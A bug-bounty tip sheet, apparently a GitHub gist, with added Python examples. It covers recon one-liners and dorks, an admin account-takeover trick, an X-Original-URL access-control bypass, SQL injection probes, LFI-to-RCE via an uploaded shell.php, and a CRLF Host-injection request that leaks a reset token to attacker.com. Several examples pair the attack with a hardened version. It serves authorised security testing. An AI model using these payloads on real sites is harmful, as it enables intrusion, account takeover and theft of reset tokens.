Gist by @BugHunter001, last active January 21, 2023 10:13
site.com/file.php
response = nothing (the PHP is executed)
http://site.com/file.php~
response = source (the editor backup copy is served as plain text; also try .bak, .old, .swp)
-------------------------------------
https://github.com/kleiton0x00/CRLF-one-liner
------------------------------------------
Try to add admin as your user,
change his email to yours,
request a password reset.
Now you are admin :)
You think this won't happen? It does, I did it ;)
You are not adding your email as the admin's email: you are adding the admin's email to your app, changing his email to yours, then requesting a password change. The admin's password reset link comes to you.
-----------------------------------------------
subfinder -dL domains.txt -o subdomains.txt && subjack -w subdomains.txt | toslack
(subdomain takeover automation; toslack is whatever notifier you pipe results into; recommended to run in a VM)
-------------------------------------------------------------------------------
Easy information disclosure:-
cat hosts.txt | httpx -path //server-status?full=true -status-code -content-length
cat hosts.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -path /web-console/ -status-code -content-length
--------------------------------------------------------------------------------
Use the following dork (combined with site:target.com) and try directory brute forcing if your target allows it. This looks for things you are not supposed to access that sit behind a login page.
inurl:login | inurl:signin | intitle:Login | intitle:"sign in" | inurl:auth
--------------------------------------------------------------------------------
Information disclosure:-
1. subfinder -d target.com | httprobe -c 100 > target.txt (got around 210 subdomains).
2. cat target.txt | aquatone -out ~/aquatone/target
3. Checked every screenshot and found an interesting subdomain.
4. Tried some low-hanging bugs (XSS, open redirect etc.) but nothing worked :(
5. Then I decided to brute force the directories; I used ffuf and one of the wordlists from @DanielMiessler's SecLists.
6. ffuf -w path/to/wordlist.txt -u https://sub.target.com/FUZZ -mc all -c -v
7. After some time got an endpoint exposing /debug/pprof, which had a lot of sensitive info such as debug info, traces etc. ;)
8. Reported the issue to the company; they quickly fixed it and acknowledged my work :)
Reference: http://link.medium.com/mym9UTLHQ9 and a great ffuf guide by @codingo_: https://youtu.be/iLFkxAmwXF0
--------------------------------------------------------------------------------
Useful services for out-of-band exploitation.
1. Burp Collaborator
2. https://webhook.site
3. https://requestcatcher.com
4. https://canarytokens.org/generate
5. http://dnsbin.zhack.ca
6. https://ngrok.com
-------------------------------------------------------------------
Google dorks for hunting
https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06
-------------------------------------------------------------------
crt.sh one liner
curl -s 'https://crt.sh/?q=%.target.com&output=json' | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
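The same pipeline as a function, as an added example that is not part of the gist. It handles the two things the one-liner glosses over: crt.sh packs several names into one name_value separated by newlines, and a certificate's SAN list can carry hosts outside the target domain that are not in scope. The sample JSON is constructed in the shape crt.sh returns; the domain is an assumption.

```python
"""Added example: parse crt.sh JSON output the way the one-liner does, plus a
scope filter. SAMPLE_CRTSH_JSON is constructed, not real crt.sh data."""
import json

SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "name_value": "*.target.com\ntarget.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "name_value": "api.target.com"},
    {"issuer_name": "C=US, O=DigiCert Inc", "name_value": "dev.target.com\ncdn.othercorp.com"},
    {"issuer_name": "C=US, O=DigiCert Inc", "name_value": "*.staging.target.com"},
    {"issuer_name": "C=US, O=DigiCert Inc", "name_value": "API.TARGET.COM"},
])


def split_crtsh(payload, domain):
    r"""Mirror of: jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
    Returns (in_scope, out_of_scope): names under `domain`, and the other
    SAN entries that shared a certificate with them (related infrastructure,
    but usually not in scope)."""
    domain = domain.lower()
    in_scope, out_of_scope = set(), set()
    for entry in json.loads(payload):
        # one name_value may hold several names, one per line
        for name in entry["name_value"].splitlines():
            name = name.strip().lower()
            if not name:
                continue
            if name.startswith("*."):      # wildcard -> its base name
                name = name[2:]
            if name == domain or name.endswith("." + domain):
                in_scope.add(name)
            else:
                out_of_scope.add(name)
    return sorted(in_scope), sorted(out_of_scope)


if __name__ == "__main__":
    hosts, related = split_crtsh(SAMPLE_CRTSH_JSON, "target.com")
    print("\n".join(hosts))
    print("related (out of scope):", ", ".join(related))
```

In practice feed it the curl output (`curl -s 'https://crt.sh/?q=%.target.com&output=json'`) instead of the embedded sample; the out-of-scope list is worth a look for sister domains even when you cannot test them.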
-------------------------------------------------------------------
Jsscanner
https://github.com/dark-warlord14/JSScanner
----------------------------------------------------------------
Subdomain enumeration (full notes):
https://www.notion.so/Subdomain-Enumaration-5109690b9db14b41b02b373af8234c93
-----------------------------------------------------------------
https://securityjunky.com/scanning-js-files-for-endpoint-and-secrets/ (full info)
----------------------------------------------------------------------
GET /admin HTTP/1.1
Host: site.com
...
Access is denied

GET /test HTTP/1.1
Host: site.com
X-Original-URL: /admin

HTTP/1.1 200 OK
(the front-end ACL only checks the request line; the back end re-routes on X-Original-URL or X-Rewrite-URL, so /admin is reached anyway)
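A model of that bypass and of the fix, as an added example that is not code from the gist or from any real server. A front-end ACL looks only at the request line while the back end honours X-Original-URL / X-Rewrite-URL; the hardened stack strips those headers at the edge and stops honouring them. Paths, handler names and the Request class are assumptions.

```python
"""Added example: X-Original-URL / X-Rewrite-URL override bypassing a
front-end path ACL, vulnerable and hardened. All names are assumptions."""
from dataclasses import dataclass, field

OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")
DENIED_PREFIXES = ("/admin",)
HANDLERS = {"/admin": "admin", "/test": "test"}   # hypothetical routes


@dataclass
class Request:
    path: str
    headers: dict = field(default_factory=dict)

    def header(self, name):
        """Case-insensitive header lookup."""
        return {k.lower(): v for k, v in self.headers.items()}.get(name.lower())


def edge_acl(req):
    """Front end: denies protected paths, but looks only at the request line."""
    return req.path.startswith(DENIED_PREFIXES)


def backend(req, honour_override):
    """Back end: dispatches on the path, optionally replaced by an override
    header (the behaviour some frameworks ship for reverse-proxy rewrites)."""
    path = req.path
    if honour_override:
        for name in OVERRIDE_HEADERS:
            if req.header(name):
                path = req.header(name)
                break
    handler = HANDLERS.get(path)
    return (200, handler) if handler else (404, None)


def vulnerable_stack(req):
    """Returns (status, handler that served the request)."""
    if edge_acl(req):
        return (403, "edge-acl")
    return backend(req, honour_override=True)


def hardened_stack(req):
    """Two independent fixes: the edge drops override headers it did not set,
    and the back end no longer honours them. Either alone closes the bypass;
    doing both is defence in depth."""
    if edge_acl(req):
        return (403, "edge-acl")
    cleaned = Request(req.path, {k: v for k, v in req.headers.items()
                                 if k.lower() not in OVERRIDE_HEADERS})
    return backend(cleaned, honour_override=False)


if __name__ == "__main__":
    probe = Request("/test", {"X-Original-URL": "/admin"})
    print("direct /admin:", vulnerable_stack(Request("/admin")))
    print("override, vulnerable:", vulnerable_stack(probe))
    print("override, hardened:", hardened_stack(probe))
```

When testing a real target, send the override headers against a path that otherwise returns 200 and watch for the response body or status of the protected path; both header names are worth trying since frameworks differ on which they read.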
---------------------------------------------------------------------------
Looking for IDORs? Check this:-
1. Keep an eye on every endpoint and what data passes through it.
2. If you create an account on the main domain, try to find subdomains with login functionality.
3. Use Burp's search functionality a lot for keywords :)
4. If sequential numbers are not working, try sending your UserId parameter along with the victim's id in the same request.
5. Once you upload images, check whether the upload generates a unique ID (and whether that ID is guessable).
-------------------------------------------------------------------------
Tip: use confirm() instead of alert(); alert is probably the most filtered word out there in XSS payloads.
------------------------------------------------------------------------
Always check for a directory named after the target on the domain, like http://site.com/site/ or http://target.com/target/.
Got the same thing on 2 subdomains of a target.
The 1st was leaking staff PII: got a 3-digit bounty.
---------------------------------------------------------------------------------
2FA bypassing for bug bounties
1. Background concept of 2FA bypass
-With the rise of account takeovers, companies like Google and Facebook have put 2FA in front of sensitive pages where an attacker could otherwise read or modify a user's data without consent. This authentication method improves the security posture and provides secure access to users. Two-factor authentication stops an attacker from compromising your account even if your credentials are leaked publicly, so a 2FA bypass removes that protection.
2. Impact of 2FA bypass
-ticket system takeover, unauthorized email verification bypass, account
3. Types of 2FA bypass: request and response manipulation.
-This needs familiarity with Burp Suite and a bit of logical thinking.
4. Security misconfiguration
Session hijacking, subdomain-to-domain bypass, missing and broken links, input validation
----------------------------------------------------------------------------------------
~Dorker
https://dorks.faisalahmed.me
----------------------------------------------------------------------------------------
curl -s "https://certspotter.com/api/v0/certs?domain=$1" | grep -o '\[\".*\"\]'
curl -s 'http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.hackerone.com&output=json' | jq .url
curl -s 'http://web.archive.org/cdx/search/cdx?url=*.cardpay.ntc.net.np/*&output=text&fl=original&collapse=urlkey'
(quote the URLs, otherwise the shell eats the & and * characters; the CDX endpoint is /cdx/search/cdx)
-----------------------------------------------------------------------------------------
1. Create an account with email@<your-burp-collaborator-host>
2. Forgot password
3. Received requests from the internal server + SMTP connection details
4. Got internal headers + origin IP
5. http://site.com/admin = (403)
6. The same /admin request sent straight to the origin IP with those internal headers = pwn
---------------------------------------------------------------------------------------------------
Looking for Jira subdomains of your targets?
Use these kinds of dorks:
inurl:companyname intitle:JIRA login
inurl:visma intitle:JIRA login
site:*.target.com filetype:jspa
-----------------------------------------------------------------
Bug Bounty Tips
Quick probes for SQL injection (URL-encode them before sending, and compare each response against the plain /?q=1 baseline; a changed status, length or a database error message is the signal):
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||' <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
/?q=1-sleep()
/?q=1 and sleep()
/?q=")
/?q=')
/?q=-x()
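The probe list turned into encoded requests plus the comparison step, as an added example that is not code from the gist. It also encodes the one inference the list relies on: if a quote-breaking probe (1') changes the response but 1/*'*/ (a quote hidden inside a SQL comment) returns the baseline, the input is being parsed as SQL rather than compared as a plain string. The base URL, the parameter name and the response table are constructed for illustration.

```python
"""Added example: URL-encode the SQLi probes above and flag responses that
differ from the baseline. Base URL, parameter and responses are constructed."""
from urllib.parse import urlencode

# The probes above as (parameter name, value); the two array forms change the
# parameter name rather than the value.
PROBES = [
    ("q", "1"), ("q", "1'"), ("q", '1"'), ("q", "[1]"), ("q[]", "1"), ("q", "1`"),
    ("q", "1\\"), ("q", "1/*'*/"), ("q", "1/*!1111'*/"), ("q", "1'||'asd'||'"),
    ("q", "1' or '1'='1"), ("q", "1 or 1=1"), ("q", "'or''='"),
    ("q", "1-sleep()"), ("q", "1 and sleep()"), ("q", '")'), ("q", "')"), ("q", "-x()"),
]
# Probes that break a quoted SQL literal ...
BREAKERS = ("1'", '1"', "1`", "1\\")
# ... and one that contains a quote yet is still valid SQL (quote inside a comment).
RESTORER = "1/*'*/"
ERROR_SIGNATURES = (
    "you have an error in your sql syntax", "unclosed quotation mark",
    "syntax error at or near", "ora-0", "pg_query", "sqlite3",
)


def probe_url(base_url, name, value):
    """URL-encode the probe: a raw ' # % + or & would be mangled in transit.
    base_url is assumed to carry no query string of its own."""
    return f"{base_url}?{urlencode({name: value})}"


def all_probe_urls(base_url):
    return [probe_url(base_url, n, v) for n, v in PROBES]


def flag(baseline, response):
    """baseline/response are (status, body_length, body). Returns the reasons
    this response differs from the baseline, or [] if it looks the same."""
    reasons = []
    if response[0] != baseline[0]:
        reasons.append(f"status {baseline[0]}->{response[0]}")
    if abs(response[1] - baseline[1]) > max(50, baseline[1] // 20):   # >5% or >50 bytes
        reasons.append(f"length {baseline[1]}->{response[1]}")
    hit = next((s for s in ERROR_SIGNATURES if s in response[2].lower()), None)
    if hit:
        reasons.append(f"error signature '{hit}'")
    return reasons


def classify(baseline, responses):
    """Map probe value -> reasons, for every probe that did not match the baseline."""
    flagged = {}
    for value, response in responses.items():
        reasons = flag(baseline, response)
        if reasons:
            flagged[value] = reasons
    return flagged


def likely_injectable(baseline, responses):
    """A breaker changed the response and the comment-wrapped quote did not."""
    broke = any(v in responses and flag(baseline, responses[v]) for v in BREAKERS)
    restored = RESTORER in responses and not flag(baseline, responses[RESTORER])
    return broke and restored


# Constructed responses for a hypothetical /?q= endpoint (status, length, body).
BASELINE = (200, 5120, "<html>... 1 result ...</html>")
RESPONSES = {
    "1'": (500, 380, "You have an error in your SQL syntax; check the manual ..."),
    '1"': (200, 5120, "<html>... 1 result ...</html>"),
    "1/*'*/": (200, 5120, "<html>... 1 result ...</html>"),
    "1 or 1=1": (200, 91000, "<html>... 1337 results ...</html>"),
}

if __name__ == "__main__":
    for url in all_probe_urls("https://site.example/"):
        print(url)
    print(classify(BASELINE, RESPONSES))
    print("likely injectable:", likely_injectable(BASELINE, RESPONSES))
```

Feed real responses into classify() by recording (status, Content-Length, body) per probe; the length threshold is deliberately loose so dynamic pages do not flag every probe, and a time-based probe still needs its own timing check since nothing here measures latency.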
----------------------------------------------------------------------------------
LFI to RCE
Uploaded shell.php, then
page=php://filter/convert.base64-encode/resource=shell.php
(returns the file base64-encoded; decode with base64 -d to confirm the include works. Including the uploaded file directly, page=shell.php, is what executes it.)
---------------------------------------------------------------------------------
wordlist for all fuzzing
https://wordlists.assetnote.io/
https://s3.amazonaws.com/assetnote-wordlists/data/automated/$filename.txt (download)
---------------------------------------------------------------------------------
Host header based CRLF injection
POST /resetPassword%0D%0AHost:attacker.com
Host: test.com
[...]
email=target@email.com
(if the target is percent-decoded and re-serialised before the headers are parsed, the injected Host line becomes a real header and the reset link is built from it)
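A working model of that request, as an added example that is not code from the gist: a front end that decodes the request target and re-serialises it turns the %0D%0A into a real line break, a first-header-wins parser then picks up the injected Host, and a reset-link builder that trusts Host mails the token to the attacker's domain. The hardened side rejects control characters in the decoded target and builds the link from a configured canonical host, which also covers plain Host-header poisoning without any CRLF. The raw request, host names, token and link format are constructed; the dummy X-Ignored header in the payload only absorbs the " HTTP/1.1" that trails the target.

```python
"""Added example: CRLF in the request target -> injected Host -> poisoned
password-reset link, with the hardened counterparts. Everything here is
constructed for illustration."""
from urllib.parse import unquote, urlsplit

CANONICAL_HOST = "test.com"   # assumption: the app's real hostname

# Constructed request in the shape of the payload above.
RAW = (
    "POST /resetPassword%0D%0AHost:%20attacker.com%0D%0AX-Ignored: HTTP/1.1\r\n"
    "Host: test.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "email=target@email.com"
)
CLEAN = "POST /resetPassword HTTP/1.1\r\nHost: test.com\r\n\r\nemail=target@email.com"


def parse_request(raw):
    """Minimal HTTP/1.1 parser -> (method, target, headers, body). The first
    occurrence of a header wins here; servers differ on this, which is why
    the injected line is worth trying both before and after the real Host."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target = request_line.split(" ", 2)[:2]
    headers = {}
    for line in header_lines:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), value.strip())
    return method, target, headers, body


def naive_rewrite(raw):
    """Vulnerable front end: percent-decodes the target and re-serialises the
    request, so %0D%0A becomes a real line break inside the request line."""
    request_line, sep, rest = raw.partition("\r\n")
    method, target, version = request_line.split(" ", 2)
    return f"{method} {unquote(target)} {version}{sep}{rest}"


def strict_rewrite(raw):
    """Hardened front end: refuse a target that decodes to any control char."""
    request_line, _, _ = raw.partition("\r\n")
    _, target, _ = request_line.split(" ", 2)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in unquote(target)):
        raise ValueError("400 Bad Request: control characters in request target")
    return raw


def build_reset_link_vulnerable(headers, token):
    """Builds the e-mailed link from whatever Host the request carried."""
    return f"https://{headers['host']}/resetPassword?token={token}"


def build_reset_link_hardened(headers, token):
    """Ignores the request Host entirely and uses the configured host."""
    return f"https://{CANONICAL_HOST}/resetPassword?token={token}"


def demo(raw=RAW, token="t0k3n"):
    """What each side produces for the constructed request."""
    _, _, headers, body = parse_request(naive_rewrite(raw))
    return {
        "seen_host": headers["host"],
        "vulnerable_link_host": urlsplit(build_reset_link_vulnerable(headers, token)).hostname,
        "hardened_link_host": urlsplit(build_reset_link_hardened(headers, token)).hostname,
        "body": body,
    }


if __name__ == "__main__":
    print(naive_rewrite(RAW))
    print(demo())
```

The reset e-mail goes to the victim, but the link in it points at attacker.com; when the victim clicks, the token arrives at the attacker's server. The fix that matters is the link builder not trusting Host; the control-character check at the edge closes the CRLF route regardless of which header the parser prefers.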
-------------------------------------------------------------------------------